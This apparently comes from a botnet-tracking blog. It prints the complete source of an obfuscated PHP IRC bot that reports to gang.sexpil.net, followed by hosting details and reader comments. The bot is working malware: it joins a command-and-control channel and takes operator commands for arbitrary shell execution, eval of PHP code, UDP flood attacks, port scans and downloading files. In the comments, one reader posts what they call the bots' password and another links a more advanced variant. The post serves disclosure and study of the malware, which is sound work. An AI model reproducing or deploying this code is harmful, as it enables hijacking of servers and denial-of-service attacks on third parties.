gang.sexpil.net(Linux bots hosted in United States Truckee Softcom America Inc)

Another bot from Tijn
Resolved : [gang.sexpil.net] To [216.224.184.101]

<?php @set_time_limit(0); @error_reporting(0); class HbZheTqekEkqwtqTQ {

 var $ttwtzTtWQWwhzbN = array("BbWEWnHeTTwqnNhb"=>"gang.sexpil.net",
                     "eBwz"=>"23232",
                     "ZnQWe"=>"scary",
                     "KqkktZ"=>"13",
                     "KtWqnhZ"=>"#wWw#",
                     "tZQ"=>"scan",
                     "NneBweEZz"=>"41aa15390e2efa34ac693c3bd7cb8e88",
                     "eWNTTTEhbQ"=>".",
                     "BbzWWQkbNBb"=>"a87710e60dee7645081a8fc2fab74dbd");
                      var $users = array(); 

 /* txZET4EZRnuKkWrlW8MjP0M46fREwjEPHtjqoOf51zFbmWn9VZiBQVvM0chmmL2T5c9jQffIFLK */
 function yySydpvYj($host) 
 { 
    $this->users[$host] = true; 
 }
 function SjSpsYm($msg) 
 { 
    fwrite($this->rIiuOioIR,"$msgrn"); 
 }
 function aGGAJSAgavgjADGa() {
  $chars = 'abcdefghijklmnopqrstuvwxyz_ABCDEFGHIJKLMNOPQRSTUVWXYZ-0123456789';    
  $size = strlen($chars);
  for($i=0;$i<$this->ttwtzTtWQWwhzbN['KqkktZ'];$i++) {
    $str .= $chars[rand(0,$size-1)];
  }
  $this->SjSpsYm("NICK ".$str."");
 }
 function vgdMAdVDmaajYGSap() {
  $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';    
  $size = strlen($chars);
  for($i=0;$i<6;$i++) {
    $str .= $chars[rand(0,$size-1)];
  }
  if(php_uname() == "") { $uname = "---"; } else { $uname = php_uname(); }
  $this->SjSpsYm("USER ".$str."-w 127.0.0.1 localhost :".$uname."");
 }
 function GjSsPVjJda($to,$msg)
 {
    $this->SjSpsYm("NOTICE $to :$msg");
 }
 function jgVjvJpgavSpa() 
 { 
    if(!($this->rIiuOioIR = fsockopen($this->ttwtzTtWQWwhzbN['BbWEWnHeTTwqnNhb'],$this->ttwtzTtWQWwhzbN['eBwz'],$e,$s,30))) 
    $this->jgVjvJpgavSpa(); 
    $this->vgdMAdVDmaajYGSap();
    if(strlen($this->ttwtzTtWQWwhzbN['ZnQWe'])>0) 
    $this->SjSpsYm("PASS ".$this->ttwtzTtWQWwhzbN['ZnQWe']);
    $this->aGGAJSAgavgjADGa();
    $this->YJpaYmvGmaMGaP();
 }

 /* SxYRjO0KuL56C8ePkQH3LJ3Vq90ZEBzmZo382UJmvEjXDoCN4aHGKAr0ziQ4KggAuazmV8zgDJ4 */
 function yAasajsypAaVjaspdd($host,$packetsize,$time) {
    $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2UdpFlood Started!2]"); 
    $packet = "";
    for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
    $timei = time();
    $i = 0;
    while(time()-$timei < $time) {
        $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
          fwrite($fp,$packet);
           fclose($fp);
        $i++;
    }
    $env = $i * $packetsize;
    $env = $env / 1048576;
    $vel = $env / $time;
    $vel = round($vel);
    $env = round($env);
    $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2UdpFlood Finished!2]: $env MB enviados / Media: $vel MB/s ");
 }
 function PjavvayGYgyayYAypDG() {
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "034ON03"; }
    else { $safemode = "039OFF03"; }

    $unme = php_uname();
    if($unme == "") { $mname = "0315---03"; }
    else { $mname = "0315".$unme."03"; }
         
     $url = "0315http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."03";
     $pth = "0315".getcwd()."03";
          
    $pthh =  getcwd()."";
    $perms = fileperms("$pthh");

    if (($perms & 0xC000) == 0xC000) { $info = 's';
    } elseif (($perms & 0xA000) == 0xA000) { $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) { $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) { $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) { $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) { $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) { $info = 'p';
    } else { $info = 'u'; }

    // Owner
    $info .= (($perms & 0x0100) ? 'r' : '-');
    $info .= (($perms & 0x0080) ? 'w' : '-');
    $info .= (($perms & 0x0040) ?
            (($perms & 0x0800) ? 's' : 'x' ) :
            (($perms & 0x0800) ? 'S' : '-'));
    // Group
    $info .= (($perms & 0x0020) ? 'r' : '-');
    $info .= (($perms & 0x0010) ? 'w' : '-');
    $info .= (($perms & 0x0008) ?
            (($perms & 0x0400) ? 's' : 'x' ) :
            (($perms & 0x0400) ? 'S' : '-'));
    // World
    $info .= (($perms & 0x0004) ? 'r' : '-');
    $info .= (($perms & 0x0002) ? 'w' : '-');
    $info .= (($perms & 0x0001) ?
            (($perms & 0x0200) ? 't' : 'x' ) :
            (($perms & 0x0200) ? 'T' : '-'));
            
    $rghts = "0315".$info."03";

    $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"0314[SAFE:032 $safemode20314]0315 $url 0314[pwd:]0315 $pth 0314(03$rghts0314) [uname:]0315 $mname");
 }
 function YyajayjSaggv($host) 
 { 
    if(isset($this->users[$host])) 
       return 1; 
    else 
       return 0; 
 }
 function AvYSAY($chan,$key=NULL) 
 { 
    $this->SjSpsYm("JOIN $chan $key"); 
 }
 function dgdvYYGG($host) 
 { 
    unset($this->users[$host]); 
 }
function YJpaYmvGmaMGaP() 
 { 
    while(!feof($this->rIiuOioIR)) 
    { 
       $this->buf = trim(fgets($this->rIiuOioIR,512)); 
       $EqqHQNKwKkzHW = explode(" ",$this->buf); 
       if(substr($this->buf,0,6)=="PING :") 
       { 
          $this->SjSpsYm("PONG :".substr($this->buf,6)); 
       } 
       if(isset($EqqHQNKwKkzHW[1]) && $EqqHQNKwKkzHW[1] =="004") 
       { 
          $this->SjSpsYm("MODE ".$this->nick." ".$this->ttwtzTtWQWwhzbN['']); 
          $this->SjSpsYm("JOIN ".$this->ttwtzTtWQWwhzbN['KtWqnhZ']." ".$this->ttwtzTtWQWwhzbN['tZQ']."");
          $this->AvYSAY($this->ttwtzTtWQWwhzbN['KtWqnhZ'],$this->ttwtzTtWQWwhzbN['tZQ']);
          $this->PjavvayGYgyayYAypDG();
       } 
       if(isset($EqqHQNKwKkzHW[1]) && $EqqHQNKwKkzHW[1]=="433") 
       { 
          $this->aGGAJSAgavgjADGa(); 
       } 
    /* 6XxKRxho7IFY8OF2pL9P5afiVeI2HiWE5keNIl1FTxuRcZKsBJ8xKdFvhenPmajilnWTzOpicK0 */
       if($this->buf != $old_buf) 
       { 
          $tzNWEQKhTkbNbk = array(); 
          $OOL = substr(strstr($this->buf," :"),2); 
          $Rrci = explode(" ",$OOL); 
          $XUULo = explode("!",$EqqHQNKwKkzHW[0]); 
          $FUOlRi = explode("@",$XUULo[1]); 
          $FUOlRi = $FUOlRi[1]; 
          $XUULo = substr($XUULo[0],1); 
          $IFfouOu = $EqqHQNKwKkzHW[0]; 
          if($Rrci[0]==$this->XUULo) 
          { 
           for($i=0;$i<count($Rrci);$i++) 
              $tzNWEQKhTkbNbk[$i] = $Rrci[$i+1]; 
          } 
          else 
          { 
           for($i=0;$i<count($Rrci);$i++) 
              $tzNWEQKhTkbNbk[$i] = $Rrci[$i]; 
          } 
          if(count($EqqHQNKwKkzHW)>2) 
          { 
             switch($EqqHQNKwKkzHW[1]) 
             { 
                case "QUIT": 
                   if($this->YyajayjSaggv($IFfouOu)) 
                   { 
                      $this->dgdvYYGG($IFfouOu); 
                   } 
                break; 
                case "PART": 
                   if($this->YyajayjSaggv($IFfouOu)) 
                   { 
                      $this->dgdvYYGG($IFfouOu); 
                   } 
                break; 
                case "PRIVMSG": 
                   if(!$this->YyajayjSaggv($IFfouOu) && (md5($FUOlRi) == $this->ttwtzTtWQWwhzbN['BbzWWQkbNBb'] || $this->ttwtzTtWQWwhzbN['BbzWWQkbNBb'] == "*")) 
                   { 
                      if(substr($tzNWEQKhTkbNbk[0],0,1)==$this->ttwtzTtWQWwhzbN['eWNTTTEhbQ']) 
                      { 
                         switch(substr($tzNWEQKhTkbNbk[0],1)) 
                         { 
                            case "user": 
                              if(md5($tzNWEQKhTkbNbk[1])==$this->ttwtzTtWQWwhzbN['NneBweEZz']) 
                              { 
                                 $this->yySydpvYj($IFfouOu);
                              } 
                              else 
                              { 
                                 $this->GjSsPVjJda($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2Auth2]: Foute password $XUULo idioot!!");
                              } 
                            break; 
                         } 
                      } 
                   } 
             /* ezBw1buoLyT6FYkkaltjwH5g6JvfL56QvxdmyyA9Wk6s9hC9sWjPueVqOgwqcs6xQaKfyaeklbC */
                   elseif($this->YyajayjSaggv($IFfouOu)) 
                   { 
                      if(substr($tzNWEQKhTkbNbk[0],0,1)==$this->ttwtzTtWQWwhzbN['eWNTTTEhbQ']) 
                      { 
                         switch(substr($tzNWEQKhTkbNbk[0],1)) 
                         {
                            case "passthru": 
                               $command = substr(strstr($OOL,$tzNWEQKhTkbNbk[0]),strlen($tzNWEQKhTkbNbk[0])+1); 

                               $exec = passthru($command); 
                               $ret = explode("n",$exec); 
                               for($i=0;$i<count($ret);$i++) 
                                  if($ret[$i]!=NULL) 
                                     $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"      : ".trim($ret[$i])); 
                break;
                            case "die": 
                               $this->SjSpsYm("QUIT :die command from $XUULo");
                               fclose($this->rIiuOioIR); 
                               exit;
                            case "udpflood": 
                               if(count($tzNWEQKhTkbNbk)>3) 
                               { 
                                  $this->yAasajsypAaVjaspdd($tzNWEQKhTkbNbk[1],$tzNWEQKhTkbNbk[2],$tzNWEQKhTkbNbk[3]); 
                               } 
                break;
                            case "pscan": 
                               if(count($tzNWEQKhTkbNbk) > 2) 
                               { 
                                  if(fsockopen($tzNWEQKhTkbNbk[1],$tzNWEQKhTkbNbk[2],$e,$s,15)) 
                                     $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2pscan2]: ".$tzNWEQKhTkbNbk[1].":".$tzNWEQKhTkbNbk[2]." is 2open2"); 
                                  else 
                                     $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2pscan2]: ".$tzNWEQKhTkbNbk[1].":".$tzNWEQKhTkbNbk[2]." is 2closed2"); 
                               } 
                break;
                            case "info":
                   $this->PjavvayGYgyayYAypDG();
                break;
                            case "exec": 
                               $command = substr(strstr($OOL,$tzNWEQKhTkbNbk[0]),strlen($tzNWEQKhTkbNbk[0])+1); 
                               $exec = exec($command); 
                               $ret = explode("n",$exec); 
                               for($i=0;$i<count($ret);$i++) 
                                  if($ret[$i]!=NULL) 
                                     $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"      : ".trim($ret[$i])); 
                break;
                            case "logout": 
                               $this->dgdvYYGG($IFfouOu); 
                               $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[auth:]0314 Je bent nu uitgelogt $XUULo"); 
                break;
                            case "dns": 
                               if(isset($tzNWEQKhTkbNbk[1])) 
                               { 
                                  $ip = explode(".",$tzNWEQKhTkbNbk[1]); 
                                  if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) 
                                  { 
                                     $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2dns2]: ".$tzNWEQKhTkbNbk[1]." => ".gethostbyaddr($tzNWEQKhTkbNbk[1])); 
                                  } 
                                  else 
                                  { 
                                     $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2dns2]: ".$tzNWEQKhTkbNbk[1]." => ".gethostbyname($tzNWEQKhTkbNbk[1])); 
                                  } 
                               } 
                break;
                            case "restart": 
                               $this->SjSpsYm("QUIT :gerestart door $XUULo");
                               fclose($this->rIiuOioIR); 
                               $this->jgVjvJpgavSpa(); 
                break;
                            case "download": 
                               if(count($tzNWEQKhTkbNbk) > 2) 
                               { 
                                  if(!$fp = fopen($tzNWEQKhTkbNbk[2],"w")) 
                                  {  
                                     $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[download:]0314 Kon bestand niet downloaden. Toestemming geweigerd."); 
                                  } 
                                  else 
                                  { 
                                     if(!$get = file($tzNWEQKhTkbNbk[1])) 
                                     { 
                                        $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[download:]0314 Kan bestand 2".$tzNWEQKhTkbNbk[1]."2 niet downloaden."); 
                                     } 
                                     else 
                                     { 
                                        for($i=0;$i<=count($get);$i++) 
                                        { 
                                           fwrite($fp,$get[$i]); 
                                        } 
                                        $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[download:]0314 Bestand 2".$tzNWEQKhTkbNbk[1]."2 gedownload naar 2".$tzNWEQKhTkbNbk[2]."2"); 
                                     } 
                                     fclose($fp); 
                                  } 
                               }
                               else { $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[download:]0314 Typ ".download http://your.host/file /tmp/file""); }
                break;
                            case "sexec":
                               $command = substr(strstr($OOL,$tzNWEQKhTkbNbk[0]),strlen($tzNWEQKhTkbNbk[0])+1); 
                               $exec = shell_exec($command); 
                               $ret = explode("n",$exec); 
                               for($i=0;$i<count($ret);$i++) 
                                  if($ret[$i]!=NULL) 
                                     $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"      : ".trim($ret[$i])); 
                break;
                            case "eval":
                              $eval = eval(substr(strstr($OOL,$tzNWEQKhTkbNbk[1]),strlen($tzNWEQKhTkbNbk[1])));
                break;
                            case "raw":
                               $this->SjSpsYm(strstr($OOL,$tzNWEQKhTkbNbk[1])); 
                break;
                            case "system": 
                               $command = substr(strstr($OOL,$tzNWEQKhTkbNbk[0]),strlen($tzNWEQKhTkbNbk[0])+1); 
                               $exec = system($command); 
                               $ret = explode("n",$exec); 
                               for($i=0;$i<count($ret);$i++) 
                                  if($ret[$i]!=NULL) 
                                     $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"      : ".trim($ret[$i])); 
                break;
                            case "rndnick": 
                               $this->aGGAJSAgavgjADGa(); 
                break;
                            case "popen": 
                               if(isset($tzNWEQKhTkbNbk[1])) 
                               { 
                                  $command = substr(strstr($OOL,$tzNWEQKhTkbNbk[0]),strlen($tzNWEQKhTkbNbk[0])+1); 
                                  $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"[2popen2]: $command");
                                  $pipe = popen($command,"r"); 
                                  while(!feof($pipe)) 
                                  { 
                                     $pbuf = trim(fgets($pipe,512)); 
                                     if($pbuf != NULL) 
                                        $this->mvppvYGyYVS($this->ttwtzTtWQWwhzbN['KtWqnhZ'],"     : $pbuf"); 
                                  } 
                                  pclose($pipe); 
                               }  
                break;
                         } 
                      } 
                   } 
                break; 
             } 
          } 
       } 
       $old_buf = $this->buf; 
    } 
    $this->jgVjvJpgavSpa(); 
 }
 function mvppvYGyYVS($to,$msg)
 {
    $this->SjSpsYm("PRIVMSG $to :$msg");
 }
}
$lcuXcFOO = new HbZheTqekEkqwtqTQ;
$lcuXcFOO->jgVjvJpgavSpa(); ?>

hosting infos:
http://whois.domaintools.com/216.224.184.101

Categories: Uncategorized

9 Comments

makaveli - May 11, 2012 at 2:06 pm

Heyy what can we do with this ? just warning about site web ?

Pig - May 11, 2012 at 5:28 pm

all u can do is learning something if u feel ready for it

Anonymous - May 12, 2012 at 1:07 am

I've gotten several copies of this bot on my honeypot. When I saw it, I laughed since they tried obfuscating the code but basically just changed the damn functions name.

REAL SECURE DAWGS!

Btw, they use some super duper hax0r3d ircd with barely any info provided to non-admin users.

makaveli - May 12, 2012 at 9:23 am

@pig thank's mate, but it is php code right ? what do this code ?

Pig - May 12, 2012 at 3:21 pm

makaveli u can do portscan, ddos, download files and much more
just read the source

Anonymous - May 12, 2012 at 7:41 pm

It's just like any other version of pbot. The function names have just been renamed.

Pig - May 12, 2012 at 8:33 pm

this is more advanced from same guy

http://hpaste.org/68434

1x33x7 - June 15, 2012 at 7:41 am

HeHe,
the password for the pbots is "p0w3r" without the ""
much fun 🙂

MFG
1x33x7

1x33x7 - June 15, 2012 at 7:43 am

pass is p0w3r for the pbots 😀

Comments are closed